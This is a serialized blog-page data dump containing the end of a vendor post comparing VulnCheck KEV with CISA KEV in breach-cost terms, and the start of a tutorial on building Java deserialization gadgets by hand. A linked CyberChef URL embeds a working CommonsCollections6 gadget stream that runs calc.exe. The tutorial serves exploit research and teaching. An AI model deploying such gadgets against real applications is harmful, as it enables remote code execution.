But when VulnCheck was first, the average lead time was actually ",[295,12493,12445],{},": over a month of earlier awareness.",[18,12496,12497],{},[68,12498],{":width":10862,"alt":12499,"src":12500},"Lead Time Distribution","\u002Fblog\u002Feconomic-value-lead-time\u002Flead-time-distribution.png",[18,12502,12503,12504,12507],{},"The bulk (54.8%) are within a week. But the long tail is significant: ",[295,12505,12506],{},"nearly 27% of VulnCheck-first entries had a lead of over 30 days."," These are the cases where organizations relying solely on CISA KEV were flying blind for a month or more.",[18,12509,12510],{},[68,12511],{":width":10862,"alt":12512,"src":12513},"Timeline Comparison","\u002Fblog\u002Feconomic-value-lead-time\u002Fcve-timeline-comparison.png",[18,12515,12516,12517],{},"The CrushFTP and Citrix examples are particularly notable. These are well-known, actively exploited vulnerabilities where VulnCheck had them cataloged ",[295,12518,12519],{},"9-11 months before CISA.",[61,12521,12523],{"id":12522},"why-the-difference","Why the Difference?",[18,12525,12526],{},"VulnCheck's earlier detection comes from several factors:",[1789,12528,12529,12535,12541,12547],{},[25,12530,12531,12534],{},[295,12532,12533],{},"Broader source coverage:"," VulnCheck monitors over 500 sources for exploitation evidence, including exploit repositories, threat actor infrastructure, and global security research",[25,12536,12537,12540],{},[295,12538,12539],{},"Automated detection:"," Continuous monitoring versus manual curation processes",[25,12542,12543,12546],{},[295,12544,12545],{},"Lower publication threshold:"," VulnCheck adds vulnerabilities based on any confirmed exploitation evidence, while CISA applies additional criteria",[25,12548,12549,12552],{},[295,12550,12551],{},"Real-time updates:"," Multiple daily updates versus periodic batch additions",[18,12554,12555],{},"CISA KEV serves an important purpose. 
It's an authoritative, government-backed catalog with mandated remediation timelines for federal agencies. But it was designed for compliance, not speed.",[61,12557,12559],{"id":12558},"translating-speed-to-dollars","Translating Speed to Dollars",[18,12561,12562,12563,12566],{},"Knowing VulnCheck is faster is useful. Knowing what that speed is ",[1131,12564,12565],{},"worth"," is actionable.",[18,12568,12569],{},"IBM's Cost of a Data Breach Report 2025 provides the data we need to build a financial model.",[993,12571,12573],{"id":12572},"the-cost-of-time","The Cost of Time",[307,12575,12576,12586],{},[310,12577,12578],{},[313,12579,12580,12583],{},[316,12581,12582],{},"Breach Lifecycle",[316,12584,12585],{},"Average Cost (2025)",[336,12587,12588,12596,12604],{},[313,12589,12590,12593],{},[341,12591,12592],{},"Under 200 days",[341,12594,12595],{},"$3.87 million",[313,12597,12598,12601],{},[341,12599,12600],{},"Over 200 days",[341,12602,12603],{},"$5.01 million",[313,12605,12606,12611],{},[341,12607,12608],{},[295,12609,12610],{},"Differential",[341,12612,12613],{},[295,12614,12615],{},"$1.14 million",[18,12617,12618],{},[1131,12619,12620],{},"Source: IBM Cost of a Data Breach Report 2025, Figure 12, p. 19",[993,12622,12624],{"id":12623},"daily-exposure-cost","Daily Exposure Cost",[307,12626,12627,12638],{},[310,12628,12629],{},[313,12630,12631,12634,12636],{},[316,12632,12633],{},"Data Point",[316,12635,2750],{},[316,12637,2468],{},[336,12639,12640,12651,12662],{},[313,12641,12642,12645,12648],{},[341,12643,12644],{},"Global Average Breach Cost",[341,12646,12647],{},"$4.44 million",[341,12649,12650],{},"IBM 2025, p. 10",[313,12652,12653,12656,12659],{},[341,12654,12655],{},"Average Breach Lifecycle",[341,12657,12658],{},"241 days",[341,12660,12661],{},"IBM 2025, p. 
17",[313,12663,12664,12668,12673],{},[341,12665,12666],{},[295,12667,12624],{},[341,12669,12670],{},[295,12671,12672],{},"$18,423\u002Fday",[341,12674,12675],{},"Calculated",[993,12677,12679],{"id":12678},"vulnerability-exploitation-context","Vulnerability Exploitation Context",[307,12681,12682,12691],{},[310,12683,12684],{},[313,12685,12686,12689],{},[316,12687,12688],{},"Metric",[316,12690,2750],{},[336,12692,12693,12701,12709,12717],{},[313,12694,12695,12698],{},[341,12696,12697],{},"Percentage of breaches from vulnerability exploitation",[341,12699,12700],{},"11%",[313,12702,12703,12706],{},[341,12704,12705],{},"Average cost of vulnerability-initiated breach",[341,12707,12708],{},"$4.24 million",[313,12710,12711,12714],{},[341,12712,12713],{},"Average time to identify and contain",[341,12715,12716],{},"245 days",[313,12718,12719,12722],{},[341,12720,12721],{},"Zero-day vulnerability lifecycle (MTTI + MTTC)",[341,12723,12724],{},"252 days",[18,12726,12727],{},[1131,12728,12729],{},"Source: IBM Cost of a Data Breach Report 2025, Figure 10, p. 18",[18,12731,12732],{},"That 252-day figure for zero-day vulnerabilities is critical. This is precisely where earlier intelligence provides maximum value.",[61,12734,12736],{"id":12735},"the-financial-impact-of-28-days","The Financial Impact of 28 Days",[307,12738,12739,12752],{},[310,12740,12741],{},[313,12742,12743,12746,12749],{},[316,12744,12745],{},"Scenario",[316,12747,12748],{},"Lead Time",[316,12750,12751],{},"Risk Avoided per Incident",[336,12753,12754,12766,12776],{},[313,12755,12756,12759,12761],{},[341,12757,12758],{},"VulnCheck vs. CISA KEV (mean)",[341,12760,12442],{},[341,12762,12763],{},[295,12764,12765],{},"$518,276",[313,12767,12768,12771,12773],{},[341,12769,12770],{},"VulnCheck vs. 
CISA KEV (median)",[341,12772,12453],{},[341,12774,12775],{},"$55,269",[313,12777,12778,12781,12783],{},[341,12779,12780],{},"When VulnCheck was first (mean)",[341,12782,12445],{},[341,12784,12785],{},[295,12786,12787],{},"$767,110",[18,12789,12790],{},[68,12791],{":width":10862,"alt":12792,"src":12793},"Risk Avoided by Incident Count","\u002Fblog\u002Feconomic-value-lead-time\u002Fannual-risk-avoided.png",[18,12795,12796],{},[1131,12797,12798],{},"Source: IBM Cost of a Data Breach Report 2025, Figure 3, p. 11",[61,12800,12802],{"id":12801},"knowing-is-step-one-acting-is-where-the-value-is","Knowing Is Step One. Acting Is Where the Value Is",[18,12804,12805,12806,12809,12810,12813],{},"The $518K isn't saved by ",[1131,12807,12808],{},"knowing"," 28 days earlier. It's saved by ",[1131,12811,12812],{},"acting"," 28 days earlier.",[18,12815,12816],{},"VulnCheck KEV is free because awareness is table stakes. It answers the question: \"Is this vulnerability being exploited in the wild?\" That's essential, but it's just the starting line.",[18,12818,12819],{},"The harder questions are:",[22,12821,12822,12828,12834,12840],{},[25,12823,12824,12827],{},[295,12825,12826],{},"How is it being exploited?"," Is there weaponized code? A Metasploit module? Ransomware integration?",[25,12829,12830,12833],{},[295,12831,12832],{},"Who is exploiting it?"," Nation-state? Financially motivated? Opportunistic scanning?",[25,12835,12836,12839],{},[295,12837,12838],{},"Can I detect it?"," Do I have signatures ready to deploy, or am I writing them from scratch?",[25,12841,12842,12845],{},[295,12843,12844],{},"Am I exposed?"," Is this vulnerability even in my environment?",[18,12847,12848],{},"Answering those questions manually across 550+ sources is where security teams burn 60-100 hours per week. 
That's 2-4 FTEs worth of effort just to stay current.",[18,12850,12851],{},"VulnCheck's platform provides:",[22,12853,12854,12860,12866,12872,12878],{},[25,12855,12856,12859],{},[295,12857,12858],{},"Exploit intelligence",": PoC code, weaponization status, exploit maturity, and timelines",[25,12861,12862,12865],{},[295,12863,12864],{},"Detection artifacts",": Production-ready Suricata, Snort, YARA, and Sigma rules, along with full packet captures (PCAPs) of real exploit traffic, vulnerable Docker containers for testing detection stacks, and in-house exploits developed by VulnCheck's research team via the Go-Exploit framework",[25,12867,12868,12871],{},[295,12869,12870],{},"Canary intelligence",": A global network of intentionally vulnerable instances that capture real attacker payloads in the wild — providing first-party IOCs, encoded commands, file hashes, and delivery mechanisms that feed directly back into detection engineering and threat intelligence enrichment",[25,12873,12874,12877],{},[295,12875,12876],{},"Threat actor attribution",": Which groups are actively using the exploit, with ties to ransomware families and botnet campaigns",[25,12879,12880,12883],{},[295,12881,12882],{},"Attack surface queries",": Check exposure across Shodan, Censys, FOFA, ZoomEye, and GreyNoise",[18,12885,12886,12887,12890,12891,12894],{},"KEV tells you ",[1131,12888,12889],{},"what"," to prioritize. The platform tells you ",[1131,12892,12893],{},"how"," to act on it. That's where the 28-day advantage translates into actual risk reduction.",[61,12896,12898],{"id":12897},"real-world-validation","Real-World Validation",[18,12900,12901],{},"We recently worked with a major financial institution in the APAC region that wanted to validate our claims with their own data.",[18,12903,12904,12905],{},"Their security team ran an independent analysis comparing VulnCheck KEV against their current internal vulnerability intelligence sources across 10 recently exploited CVEs. 
Their finding: ",[295,12906,12907],{},"VulnCheck was 6.3 days faster on average.",[18,12909,12910,12911,12914],{},"Using the financial services daily exposure cost of $23,070, that translates to ",[295,12912,12913],{},"$145,341 in risk avoided per incident",", and over $700,000 annually at typical incident frequencies.",[18,12916,12917],{},"The 6.3-day figure is lower than our 28.13-day CISA KEV comparison because this institution already has mature vulnerability intelligence capabilities. VulnCheck still provided meaningful acceleration even against a sophisticated baseline. Organizations using CISA KEV as their primary source would see significantly larger gains.",[61,12919,12921],{"id":12920},"the-broader-context-why-this-matters-now","The Broader Context: Why This Matters Now",[18,12923,12924],{},"Three trends from the 2025 IBM report make faster vulnerability intelligence increasingly critical:",[993,12926,12928],{"id":12927},"_1-attackers-are-accelerating","1. Attackers are accelerating",[18,12930,12931],{},"16% of breaches in 2025 involved attackers using AI, with 37% of those involving AI-generated phishing and 35% involving deepfake attacks. As adversaries leverage AI to identify and exploit vulnerabilities faster, defenders need automation to maintain parity.",[18,12933,12934],{},[1131,12935,12936],{},"Source: IBM Cost of a Data Breach Report 2025, pp. 46-47",[993,12938,12940],{"id":12939},"_2-the-skills-gap-is-widening","2. The skills gap is widening",[18,12942,12943,12944,12947,12948,12951],{},"48% of organizations reported high levels of security skills shortage. Organizations with high shortages paid ",[295,12945,12946],{},"$5.22 million"," per breach versus ",[295,12949,12950],{},"$3.65 million"," for those with adequate staffing, a $1.57 million differential.",[18,12953,12954],{},[1131,12955,12956],{},"Source: IBM Cost of a Data Breach Report 2025, Figure 42, p. 45",[18,12958,12959],{},"You can't hire your way out of this problem. 
Automation and better intelligence are the only paths that scale.",[993,12961,12963],{"id":12962},"_3-ai-and-automation-deliver-proven-roi","3. AI and automation deliver proven ROI",[18,12965,12966,12967,12970,12971,12974,12975,59],{},"Organizations using AI and automation extensively had an average breach cost of ",[295,12968,12969],{},"$3.62 million"," versus ",[295,12972,12973],{},"$5.52 million"," for those without, a ",[295,12976,12977],{},"$1.9 million savings",[18,12979,12980],{},[1131,12981,12982],{},"Source: IBM Cost of a Data Breach Report 2025, Figure 44, p. 47",[61,12984,12986],{"id":12985},"methodology-notes","Methodology Notes",[18,12988,12989],{},"We make a strong effort to be transparent about our research. Here's how this analysis was conducted:",[18,12991,12992,12995,12996,8659,12999,13002],{},[295,12993,12994],{},"Data source:"," VulnCheck KEV export, which contains both the VulnCheck ",[886,12997,12998],{},"date_added",[886,13000,13001],{},"cisa_date_added"," fields for each entry",[18,13004,13005,13008,13009,13011,13012,13014],{},[295,13006,13007],{},"Filter criteria:"," Only entries where VulnCheck's ",[886,13010,12998],{}," is in 2024 or 2025, AND a ",[886,13013,13001],{}," value exists",[18,13016,13017,10515,13019,13021],{},[295,13018,12398],{},[886,13020,12401],{}," (positive = VulnCheck was first)",[18,13023,13024,13027,13028,13031],{},[295,13025,13026],{},"Important note on scope:"," This analysis only includes CVEs that appear in ",[1131,13029,13030],{},"both"," catalogs. VulnCheck KEV contains many additional vulnerabilities with confirmed exploitation evidence that have not yet been added to CISA KEV. 
Those are excluded from this comparison but represent additional coverage VulnCheck provides.",[18,13033,13034,13037],{},[295,13035,13036],{},"IBM data:"," All breach cost figures are from IBM Security & Ponemon Institute's Cost of a Data Breach Report 2025, with specific page and figure citations provided.",[18,13039,13040,13041,13044],{},"You can validate our KEV comparison yourself using ",[47,13042,1233],{"href":2871,"rel":13043},[51],", which is available as a free community resource.",[61,13046,13048],{"id":13047},"considerations","Considerations",[18,13050,13051],{},"A few caveats to keep in mind:",[1789,13053,13054,13060,13066,13072],{},[25,13055,13056,13059],{},[295,13057,13058],{},"Lead time does not equal exploit time."," VulnCheck's earlier addition date reflects when exploitation evidence became available, not necessarily when exploitation began. However, earlier awareness still accelerates defender response.",[25,13061,13062,13065],{},[295,13063,13064],{},"Daily exposure is a model."," The $18,423\u002Fday figure is derived from averages. Actual costs vary by organization size, industry, geography, and incident specifics.",[25,13067,13068,13071],{},[295,13069,13070],{},"Not all incidents are equal."," Some exploitation events result in full breaches; others are detected and contained quickly. The financial model assumes the vulnerability was a contributing factor to a breach-level incident.",[25,13073,13074,13077],{},[295,13075,13076],{},"The comparison is against CISA KEV specifically."," Organizations using other commercial threat intelligence sources may see different results. The financial institution example (6.3 days) demonstrates this variance.",[61,13079,13081],{"id":13080},"the-bottom-line","The Bottom Line",[18,13083,12357,13084,13086],{},[295,13085,12360],{}," than CISA KEV on average. 
In two-thirds of cases, VulnCheck had meaningful lead time, often weeks or months ahead.",[18,13088,13089],{},"That speed advantage, when paired with the intelligence to act on it, translates to real money:",[18,13091,13092],{},[68,13093],{":width":10862,"alt":13094,"src":13095},"Risk Avoided by Industry","\u002Fblog\u002Feconomic-value-lead-time\u002Frisk-avoided-by-industry.png",[18,13097,13098],{},"Knowing earlier only matters if you can act earlier. When you're in a race against attackers, that's the difference between containing a threat and becoming a headline.",[61,13100,13102],{"id":13101},"learn-more","Learn More",[18,13104,13105,13108,13109,59],{},[47,13106,1233],{"href":2871,"rel":13107},[51]," is available as a free community resource for tracking exploited vulnerabilities. If you're looking to move beyond awareness into action, with exploit intelligence, detection artifacts, and attack surface visibility, ",[47,13110,13113],{"href":13111,"rel":13112},"https:\u002F\u002Fwwv.vulncheck.com\u002Fdemo-request",[51],"explore the full VulnCheck platform",[18,13115,13116],{},"The full Economic Impact Report, including detailed methodology and industry-specific calculations, is available upon request.",[61,13118,13119],{"id":10520},"Sources",[1789,13121,13122,13129,13136],{},[25,13123,13124,13125,13128],{},"IBM Security & Ponemon Institute. (2025). ",[1131,13126,13127],{},"Cost of a Data Breach Report 2025."," pp. 10-11, 17-19, 45-47.",[25,13130,13131,13132,13135],{},"VulnCheck. (2025). ",[1131,13133,13134],{},"VulnCheck KEV vs. 
CISA KEV Analysis, 2024-2025."," Internal analysis.",[25,13137,13131,13138,10515,13141],{},[1131,13139,13140],{},"2024 Trends in Vulnerability Exploitation.",[47,13142,13143],{"href":13143,"rel":13144},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002F2024-exploitation-trends",[51],{"title":219,"searchDepth":220,"depth":220,"links":13146},[13147,13148,13151,13152,13157,13158,13159,13160,13165,13166,13167,13168,13169],{"id":3520,"depth":220,"text":20},{"id":12389,"depth":220,"text":12390,"children":13149},[13150],{"id":12416,"depth":1266,"text":12417},{"id":12522,"depth":220,"text":12523},{"id":12558,"depth":220,"text":12559,"children":13153},[13154,13155,13156],{"id":12572,"depth":1266,"text":12573},{"id":12623,"depth":1266,"text":12624},{"id":12678,"depth":1266,"text":12679},{"id":12735,"depth":220,"text":12736},{"id":12801,"depth":220,"text":12802},{"id":12897,"depth":220,"text":12898},{"id":12920,"depth":220,"text":12921,"children":13161},[13162,13163,13164],{"id":12927,"depth":1266,"text":12928},{"id":12939,"depth":1266,"text":12940},{"id":12962,"depth":1266,"text":12963},{"id":12985,"depth":220,"text":12986},{"id":13047,"depth":220,"text":13048},{"id":13080,"depth":220,"text":13081},{"id":13101,"depth":220,"text":13102},{"id":10520,"depth":220,"text":13119},"2026-02-11","Using IBM's 2025 Cost of a Data Breach data, VulnCheck's 28-day speed advantage translates to $518,000 in risk avoided per incident.",{},"\u002Fblog\u002Feconomic-value-lead-time",{"title":12342,"description":13171},"blog\u002Feconomic-value-lead-time",[1280,1279],"tJFrpb3Q-CIQZ5OQ-1WNQgZ7aRmOk6Y7FeuXjJOf22E",{"id":13179,"title":13180,"articles":7,"authors":13181,"body":13187,"date":14357,"description":14358,"extension":234,"image":7,"link":7,"meta":14359,"navigation":237,"path":14361,"seo":14362,"series":7,"stem":14363,"subtype":7,"tags":14364,"__hash__":14367},"blog\u002Fblog\u002Fmaking-java-gadgets.md","Making Serialization Gadgets by Hand - 
Java",[13182],{"name":13183,"avatar":13184,"link":13185,"linkName":13186},"Jonathan Peterson","https:\u002F\u002Favatars.githubusercontent.com\u002Fu\u002F203699168","https:\u002F\u002Finfosec.exchange\u002F@lobsterjerusalem","@lobsterjerusalem",{"type":15,"value":13188,"toc":14337},[13189,13195,13203,13209,13222,13225,13231,13234,13290,13294,13301,13304,13312,13329,13335,13338,13344,13354,13358,13378,13384,13413,13419,13425,13432,13463,13469,13487,13501,13504,13508,13529,13535,13556,13562,13568,13582,13592,13606,13619,13625,13631,13651,13654,13660,13670,13676,13690,13696,13702,13708,13724,13730,13752,13758,13764,13776,13779,13789,13795,13804,13810,13821,13830,13835,13841,13849,13852,13874,13877,13883,13901,13904,13910,13923,13953,13975,13981,13985,13994,14000,14003,14011,14017,14032,14049,14065,14072,14078,14103,14107,14121,14127,14133,14140,14146,14152,14162,14168,14173,14187,14203,14207,14216,14222,14228,14231,14237,14244,14250,14256,14263,14266,14268,14276,14280,14283,14286,14292,14300,14302],[61,13190,13192],{"id":13191},"this-blog-will-cover",[295,13193,13194],{},"This Blog Will Cover",[22,13196,13197,13200],{},[25,13198,13199],{},"How to create your own Java gadget deserialization library, including a breakdown on Java object streams",[25,13201,13202],{},"How to use VulnChecks’s Java deserialization library for Golang-based exploits",[61,13204,13206],{"id":13205},"continuing-the-thread",[295,13207,13208],{},"Continuing The Thread",[18,13210,13211,13212,13217,13218,13221],{},"This blog serves as a follow-up to ",[47,13213,13216],{"href":13214,"rel":13215},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fmaking-dotnet-gadgets",[51],"our previous blog"," on writing .NET serialization gadgets by hand. 
While that piece is not a necessary pre-requisite to understand the contents of this blog, it may provide some insight as to ",[1131,13219,13220],{},"why"," we are writing these gadgets by hand.",[18,13223,13224],{},"This time we are taking a look at the “Java Object Serialization Protocol”, whose specifications are not nearly as verbose or detailed as the .NET specifications. Nevertheless, with the protocol analysis tool we’ll be using, vague specs will be enough.",[993,13226,13228],{"id":13227},"useful-resources",[295,13229,13230],{},"Useful Resources",[18,13232,13233],{},"The items below will help with following along with the blog:",[22,13235,13236,13253,13262,13269,13282],{},[25,13237,13238,13239,13243,13244,13248,13249],{},"The entire Java Objection Serialization spec is ",[47,13240,305],{"href":13241,"rel":13242},"https:\u002F\u002Fdocs.oracle.com\u002Fjavase\u002F8\u002Fdocs\u002Fplatform\u002Fserialization\u002Fspec\u002Fprotocol.html",[51],", with the most important bits for our purposes documented in the “rules of grammar” ",[47,13245,305],{"href":13246,"rel":13247},"https:\u002F\u002Fdocs.oracle.com\u002Fjavase\u002F8\u002Fdocs\u002Fplatform\u002Fserialization\u002Fspec\u002Fprotocol.html#a9298",[51]," and in “Symbols and Constants” ",[47,13250,305],{"href":13251,"rel":13252},"https:\u002F\u002Fdocs.oracle.com\u002Fjavase\u002F8\u002Fdocs\u002Fplatform\u002Fserialization\u002Fspec\u002Fprotocol.html#a10152",[51],[25,13254,13255,13256,13261],{},"An example serialized Java object gadget stream (CommonsCollections6) that we will be working with is viewable using this 
",[47,13257,13260],{"href":13258,"rel":13259},"https:\u002F\u002Fgchq.github.io\u002FCyberChef\u002F#recipe=To_Hexdump(16,false,false,false)&input=rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI\u002FQAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB%2BAAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo\u002F2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB%2BABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB%2BABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5%2Bkde0cCAAB4cAAAAAF0AAhjYWxjLmV4ZXQABGV4ZWN1cQB%2BABsAAAABcQB%2BACBzcQB%2BAA9zcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh4",[51],"CyberChef page"," maintained by GCHQ",[25,13263,13264,13265],{},"A Java object analysis tool for “dumping” the 
stream: ",[47,13266,13267],{"href":13267,"rel":13268},"https:\u002F\u002Fgithub.com\u002Fphith0n\u002Fzkar",[51],[25,13270,2245,13271,13275,13276,13281],{},[47,13272,13274],{"href":13267,"rel":13273},[51],"zkar"," dump ",[47,13277,13280],{"href":13278,"rel":13279},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fmaking-java-gadgets\u002Fzkar.txt",[51],"hosted here"," (more on this in a moment)",[25,13283,13284,13285],{},"VulnCheck’s Java serialization gadget library is located on ",[47,13286,13289],{"href":13287,"rel":13288},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Ftree\u002Fmain\u002Fjava",[51],"GitHub here",[61,13291,13293],{"id":13292},"introduction-to-the-java-serialization-stream","Introduction to the Java Serialization Stream",[18,13295,13296,13297,13300],{},"With .NET, I described the serialization stream as a sequence of discrete data structures called “records.” The Java object serialization stream can be thought of in the same way, though with less complexity and greater verbosity. We will also be calling the constituent structs of the stream “records” here, too. To make things easier for myself (and readers) this time around, I used a tool called, ",[47,13298,13274],{"href":13267,"rel":13299},[51]," (credit to phith0n), that takes a serialization object binary stream as input and outputs what is basically a blueprint for the object, describing all of these records one by one in the order that they exist in the object. With the identification of the records laid out for you in this way, you can simply start building your structs out one by one. An example of a snippet from the dump is below.",[18,13302,13303],{},"Given the verbose nature of the Java stream, we won’t cover the full object in this blog, but rather some of the smaller pieces (records) that make up the stream. 
The zkar output for this gadget is about 500 lines and mostly consists of the same object types with more of the same nested inside, so readers should be able to understand the gist.",[61,13305,13307,13308,13311],{"id":13306},"you-can-view-the-full-library-with-all-relevant-records-implemented-in-vulnchecks-go-exploit-framework-here-github-getting-started","You can view the full library with all relevant records implemented in VulnCheck’s go-exploit framework here: ",[47,13309,3054],{"href":13287,"rel":13310},[51]," Getting Started",[18,13313,13314,13315,13320,13321,13325,13326,4606],{},"In the first 10 lines of the zkar output, there are a few mandatory elements that kick off the stream. First is the “",[47,13316,13319],{"href":13317,"rel":13318},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FMagic_number_(programming)",[51],"magic","”, denoting that the upcoming binary blob is indeed a serialized Java object stream that, in line with the ",[47,13322,13324],{"href":13241,"rel":13323},[51],"specification"," provided earlier, must start with a ",[47,13327,13319],{"href":13317,"rel":13328},[51],[1354,13330,13333],{"className":13331,"code":13332,"language":1359,"meta":219},[1357],"stream:\n  magic version contents\n",[886,13334,13332],{"__ignoreMap":219},[18,13336,13337],{},"After cross-referencing this with the zkar output, we see the magic, a version, and the start of “contents”:",[1354,13339,13342],{"className":13340,"code":13341,"language":1359,"meta":219},[1357],"@Magic - 0xac ed\n@Version - 0x00 05\n@Contents\n  TC_OBJECT - 0x73\n    TC_CLASSDESC - 0x72\n    @ClassName\n        @Length - 17 - 0x00 11\n        @Value - java.util.HashSet - 0x6a 61 76 61 2e 75 74 69 6c 2e 48 61 73 68 53 65 74\n    @SerialVersionUID - -5024744406713321676 - 0xba 44 85 95 96 b8 b7 34\n    @Handler - 8257536\n",[886,13343,13341],{"__ignoreMap":219},[18,13345,13346,13347,13350,13351,59],{},"The magic is made up of the two-byte hexadecimal value ",[886,13348,13349],{},"0xACED",", 
followed by the version, which will remain static as another two-byte value: ",[886,13352,13353],{},"0x0005",[993,13355,13357],{"id":13356},"reading-the-dump-and-specs","Reading The Dump and “Specs”",[18,13359,13360,13361,13363,13364,13367,13368,13371,13372,1554,13375,4606],{},"Following the ",[886,13362,13319],{}," (written as @Magic in the zkar output) and ",[886,13365,13366],{},"version,"," we get ",[886,13369,13370],{},"contents",", which according to the spec can be an ",[886,13373,13374],{},"object",[886,13376,13377],{},"blockdata",[1354,13379,13382],{"className":13380,"code":13381,"language":1359,"meta":219},[1357],"content: \u002F\u002F content can be an object or a blockdata\n  object\n  blockdata\n",[886,13383,13381],{"__ignoreMap":219},[18,13385,13386,13387,13390,13391,13393,13394,13396,13397,1554,13399,13401,13402,982,13404,13406,13407,982,13410,59],{},"This should give you an idea of how to read the spec. Basically, it shows some record type (in this case, ",[886,13388,13389],{},"content",") and then right below it,all the possible records that you can represent ",[886,13392,13389],{},". In this case, ",[886,13395,13389],{}," can be an ",[886,13398,13374],{},[886,13400,13377],{},". 
In order to see what ",[886,13403,13374],{},[886,13405,13377],{}," are, you will need to go look at the sections that start with ",[886,13408,13409],{},"object:",[886,13411,13412],{},"blockdata:",[18,13414,13415,13416,13418],{},"The section for ",[886,13417,13374],{}," is shown below:",[1354,13420,13423],{"className":13421,"code":13422,"language":1359,"meta":219},[1357],"object:\n  newObject\n  newClass\n  newArray\n  newString\n  newEnum\n  newClassDesc\n  prevObject\n  nullReference\n  exception\n  TC_RESET\n",[886,13424,13422],{"__ignoreMap":219},[18,13426,13427,13428,13431],{},"Here we see that “",[886,13429,13430],{},"object”"," can be ten different things, and for each item, we need to examine their respective sections, or “specs” as I will be calling them.",[18,13433,13434,13435,13438,13439,13442,13443,13446,13447,13450,13451,13453,13454,982,13456,13458,13459,13462],{},"Let’s use an example that actually ",[1131,13436,13437],{},"defines"," a record rather than just pointing to yet another record which points to yet another record, etc. Looking at the spec for ",[886,13440,13441],{},"blockdata,"," which points to either a ",[886,13444,13445],{},"blockdatashort"," or a ",[886,13448,13449],{},"blockdatalong",". But then right beneath ",[886,13452,13377],{}," you can see the specs for ",[886,13455,13445],{},[886,13457,13449],{},". Both of these show just one line and they start with ",[886,13460,13461],{},"TC_",", followed by a sequence of data types; this is information defining exactly how to represent that record in the stream, in binary.",[1354,13464,13467],{"className":13465,"code":13466,"language":1359,"meta":219},[1357],"blockdata: \u002F\u002F has two entries beneath it showing that it may be represented by two different possible items\n  blockdatashort \u003C- can be this \n  blockdatalong \u003C-  or this, see the next two blocks for what these look like\n\nblockdatashort: \u002F\u002F has only one line. 
Also it starts with a TC_ byte, another indicator that we are defining \"actual\" data\n  TC_BLOCKDATA (unsigned byte)\u003Csize> (byte)[size] \u003C- the byte layout, what a blockdatashort MUST look like\n\nblockdatalong:\n  TC_BLOCKDATALONG (int)\u003Csize> (byte)[size] \u003C- same as blockdata but it can be 0xffffffff long.\n",[886,13468,13466],{"__ignoreMap":219},[18,13470,13471,13472,13475,13476,13478,13479,13483,13484,13486],{},"Notice that the first item in that line is ",[886,13473,13474],{},"TC_BLOCKDATALONG",". This all capital word that starts with ",[886,13477,13461],{}," is a placeholder for what is basically the record code, a list of which is seen in the “",[47,13480,13482],{"href":13251,"rel":13481},[51],"Terminal Symbols and Constants","” section mentioned earlier. These ",[886,13485,13461],{}," values are very similar to the “RecordTypeEnums” from the .NET specification, in that they are a single byte that serves the same purpose of describing the upcoming record.",[18,13488,13489,13490,13492,13493,13496,13497,13500],{},"Looking at that constant’s section and cross referencing it with the above spec, it’s possible to figure out that the ",[886,13491,13449],{}," is made up of ",[886,13494,13495],{},"TC_BLOCKDATALONG,"," which is represented as a hexadecimal ",[886,13498,13499],{},"0x7A",". That is then followed by a four-byte int representing the size of the last portion, which is just a sequence of bytes, the size of which is defined by the preceding four-byte int.",[18,13502,13503],{},"That is the basic run down on how to understand this dump and use the spec to figure out the rules. 
